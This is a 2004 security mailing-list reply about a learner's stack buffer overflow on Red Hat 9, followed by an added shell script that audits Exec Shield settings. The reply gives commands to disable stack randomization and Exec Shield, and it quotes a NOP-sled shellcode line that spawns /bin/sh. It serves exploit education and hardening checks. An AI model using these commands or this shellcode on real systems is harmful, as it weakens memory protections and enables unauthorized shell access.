Re: Buffer Overflow Help

From: runixd (runixd_at_nullcode.net)
Date: 11/10/04

    To: vuln-dev@securityfocus.com
    Date: Wed, 10 Nov 2004 16:08:43 +0000
    
    

    On Wed, 2004-11-10 at 12:01 +0200, Harry de Grote wrote:
    > Op Tuesday 09 November 2004 04:09, eip@tampabay.rr.com sgreifde:
    > <snip>
    > > I am running GCC version 3.2.2 20030222 (Red Hat Linux 3.2.2-5) on a Redhat
    > > 9 box kernel 2.4.20-31.9. Am I doing something wrong?
    >
    > no, you don't
    >
    > but... RH does randomize the stack a little iirc

    > so, my way of doing stuff then, is just brute force it! :)
    > (you could also return to libc or whatever)

    How would returning to libc help with a randomized stack?

    Brute forcing should help, but while learning it's probably better to run a
    vanilla kernel or disable Exec Shield. Depending on your version, options
    may vary, but you should be able to disable stack randomization by setting
    /proc/sys/kernel/exec-shield-randomize to 0:
    "echo 0 > /proc/sys/kernel/exec-shield-randomize"

    and you can disable Exec Shield in /proc/sys/kernel/exec-shield; setting
    it to 0 should cause it to be disabled. Otherwise this is where you
    have to work with a non-executable stack and return to libc.

    You can start reading about Exec Shield at
    http://people.redhat.com/mingo/exec-shield/ANNOUNCE-exec-shield

    > best way to do it (i think) is : put your shellcode in the env...
    >
    > export SHELLCODE=`perl -e '{print "\x90"x65000 .
    > "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"}'`
    >
    > that should give you some breathing space for where to jump to...
    >
    > shellcode starts (on my box at 0xbfff0027, so everything from there to
    > 0xbffffe00 should do fine...

    regards
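A small audit script for the two Exec Shield knobs discussed in the reply above, added here as an example and not part of the original thread. The function and file names are mine; the directory argument is an assumption so the check can be run against a constructed copy of /proc/sys/kernel rather than only on a Red Hat 9 box, and it fails whenever either protection is off.

```shell
#!/bin/sh
# Constructed example: report whether Exec Shield and its stack
# randomization are on, by reading the same /proc/sys/kernel knobs the
# post shows how to disable. check_exec_shield DIR returns 0 only when
# both are enabled; DIR defaults to /proc/sys/kernel.

read_knob() {
    # $1: knob file; prints its first line, or "missing" if absent
    if [ -r "$1" ]; then
        head -n 1 "$1"
    else
        echo missing
    fi
}

check_exec_shield() {
    dir="${1:-/proc/sys/kernel}"
    status=0
    es=$(read_knob "$dir/exec-shield")
    rnd=$(read_knob "$dir/exec-shield-randomize")

    # exec-shield: 0 = off. Non-zero values enable it; their exact
    # meaning varies by kernel version, as the post notes.
    case "$es" in
        0)       echo "exec-shield: DISABLED (executable stack)"; status=1 ;;
        missing) echo "exec-shield: knob not present (cannot confirm)"; status=1 ;;
        *)       echo "exec-shield: enabled (value $es)" ;;
    esac

    case "$rnd" in
        0)       echo "exec-shield-randomize: DISABLED (static stack addresses)"; status=1 ;;
        missing) echo "exec-shield-randomize: knob not present (cannot confirm)"; status=1 ;;
        *)       echo "exec-shield-randomize: enabled (value $rnd)" ;;
    esac
    return $status
}

# Constructed sample directory mimicking the knobs after "echo 0 > ..."
# has turned randomization off, so the check below reports a failure.
make_sample() {
    d=$(mktemp -d)
    printf '1\n' > "$d/exec-shield"
    printf '0\n' > "$d/exec-shield-randomize"
    echo "$d"
}

sample=$(make_sample)
check_exec_shield "$sample" || echo "sample host: hardening weakened"
rm -rf "$sample"
```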


